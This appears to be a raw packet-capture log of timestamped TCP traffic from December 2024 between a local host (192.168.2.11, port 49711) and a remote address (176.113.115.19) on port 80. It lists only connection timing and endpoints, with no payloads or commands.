                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.540594101 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.545044899 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.545121908 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.545146942 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.545233011 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.549581051 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.549643993 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.549714088 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.549755096 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.554095984 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.554153919 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.554245949 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.554286957 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.558671951 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.558751106 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.558779001 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.558825016 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.563229084 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.563292027 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.563317060 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.563349009 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.567783117 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.567837954 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.567876101 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.567924976 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.571547985 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.571605921 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.571666002 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.571716070 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.575382948 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.575440884 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.575455904 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.575504065 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.579274893 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.579339027 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.579401970 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.579447985 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.583059072 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.583123922 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.583138943 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.583182096 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.586872101 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.586905956 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.586937904 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.586954117 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.590677023 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.590740919 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.590770960 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.590816021 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.594590902 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.594604015 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.594660044 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.598364115 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.598423958 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.598437071 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.598478079 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.629834890 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.629890919 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.629980087 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.630023003 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.631772041 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.631815910 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.631846905 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.631894112 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.702059984 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.702195883 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.702285051 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.702348948 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.703516960 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.703577042 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.703613997 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.703655958 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.706442118 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.706492901 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.706525087 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.706573963 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.709191084 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.709223986 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.709254026 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.709285021 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.712167978 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.712219954 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.712281942 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.712331057 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.714939117 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.714988947 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.715044022 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.715091944 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.717678070 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.717727900 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.717767000 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.717808008 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.720391035 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.720442057 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.720480919 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.720530033 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.722970009 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.723021984 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.723062992 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.723112106 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.725636005 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.725699902 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.725730896 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.725775957 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.728233099 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.728285074 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.728348970 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.728395939 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.730827093 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.730880976 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.730953932 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.731002092 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.733412981 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.733464003 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.733551025 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.733592033 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.736069918 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.736128092 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.736192942 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.736243963 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.738687992 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.738744020 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.738769054 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.738811016 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.741300106 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.741374016 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.741400957 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.741446018 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.743891001 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.743941069 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.743978977 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.744028091 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.746535063 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.746592999 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.746629953 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.746686935 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.749119043 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.749170065 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.749254942 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.749305010 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.751722097 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.751775026 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.751816034 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.751863956 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.754362106 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.754417896 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.754543066 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.754585028 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.757002115 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.757062912 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.757097006 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.757143974 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.758863926 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.758918047 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.758950949 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.758990049 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.760724068 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.760776997 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.760864019 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.760916948 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.762533903 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.762587070 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.762624979 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.762667894 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.764435053 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.764487028 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.764508009 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.764548063 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.766261101 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.766316891 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.766347885 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.766396999 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.768174887 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.768244982 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.768254042 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.768332958 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.770131111 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.770186901 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.770225048 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.770271063 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.771878958 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.771930933 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.771948099 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.771991968 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.773755074 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.773808002 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.773813009 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.773848057 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.775605917 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.775660038 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.775692940 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.775773048 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.777470112 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.777515888 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.777596951 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.777642965 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.779426098 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.779478073 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.779514074 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.779561996 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.781223059 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.781270027 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.781368971 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.781409025 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.783010006 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.783063889 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.894429922 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.894582033 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.894584894 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.894632101 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.895231962 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.895282030 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.895304918 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.895369053 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.896745920 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.896821976 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.896856070 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.896856070 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.898643970 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.898662090 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.898691893 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.898705006 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.900121927 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.900166035 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.900185108 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.900227070 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.901621103 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.901680946 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.901685953 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.901730061 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.903225899 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.903289080 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.903333902 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.903376102 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.904661894 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.904711962 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.904721022 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.904753923 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.906044960 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.906100035 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.906147003 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.906188965 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.907545090 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.907597065 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.907743931 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.907787085 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.909100056 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.909145117 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.909183025 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.909224987 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.910609007 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.910660982 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.910666943 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.910708904 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.912045956 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.912090063 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.912105083 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.912130117 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.913538933 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.913587093 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.913681984 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.913729906 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.915047884 CET8049711176.113.115.19192.168.2.11
